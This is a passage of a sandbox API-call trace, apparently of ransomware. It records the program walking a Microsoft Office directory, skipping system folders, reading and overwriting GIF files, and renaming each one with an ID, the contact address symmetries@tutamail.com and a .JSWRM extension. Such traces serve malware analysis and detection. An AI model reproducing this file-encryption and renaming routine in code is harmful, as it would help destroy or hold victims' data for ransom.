lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR22F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR22F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0120.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0120.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR22F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR22F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR22F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0120.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR22F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir22f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.195] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=6531) returned 1 [0120.195] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1980) returned 0x24e1d8 [0120.195] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1980, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1980, lpOverlapped=0x0) returned 1 [0120.197] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.197] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1980, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1980, lpOverlapped=0x0) returned 1 [0120.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.197] CloseHandle (hObject=0x314) returned 1 [0120.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0120.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0120.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0120.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0120.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0120.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0120.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0120.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR22F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir22f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR22F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir22f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0120.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.199] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a71, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR23F.GIF", cAlternateFileName="")) returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2=".") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="..") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="...") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="windows") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="recovery") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="perflogs") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="documents and settings") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="system volume information") returned 1 [0120.199] lstrcmpiW (lpString1="ZPDIR23F.GIF", lpString2="msocache") returned 1 [0120.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR23F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR23F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR23F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR23F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR23F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR23F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0120.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR23F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir23f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.200] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10865) returned 1 [0120.201] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a70) returned 0x24e1d8 [0120.201] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2a70, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2a70, lpOverlapped=0x0) returned 1 [0120.203] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.203] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2a70, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2a70, lpOverlapped=0x0) returned 1 [0120.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.203] CloseHandle (hObject=0x314) returned 1 [0120.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0120.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0120.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0120.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR23F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir23f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR23F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir23f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0120.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.207] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0120.208] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3f61, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR24F.GIF", cAlternateFileName="")) returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2=".") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="..") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="...") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="windows") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="recovery") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="perflogs") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="documents and settings") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="system volume information") returned 1 [0120.208] lstrcmpiW (lpString1="ZPDIR24F.GIF", lpString2="msocache") returned 1 [0120.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0120.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR24F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR24F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR24F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0120.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0120.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR24F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR24F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR24F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0120.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0120.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR24F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir24f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.209] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16225) returned 1 [0120.209] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3f60) returned 0x24e1d8 [0120.209] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x3f60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x3f60, lpOverlapped=0x0) returned 1 [0120.211] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.211] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x3f60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x3f60, lpOverlapped=0x0) returned 1 [0120.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.211] CloseHandle (hObject=0x314) returned 1 [0120.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0120.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0120.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0120.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0120.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR24F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir24f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR24F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir24f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0120.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0120.213] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadd780c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadd780c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadd780c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x326c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR25F.GIF", cAlternateFileName="")) returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2=".") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="..") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="...") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="windows") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="recovery") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="perflogs") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="documents and settings") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="system volume information") returned 1 [0120.213] lstrcmpiW (lpString1="ZPDIR25F.GIF", lpString2="msocache") returned 1 [0120.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0120.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR25F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR25F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR25F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0120.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0120.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR25F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR25F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR25F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0120.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 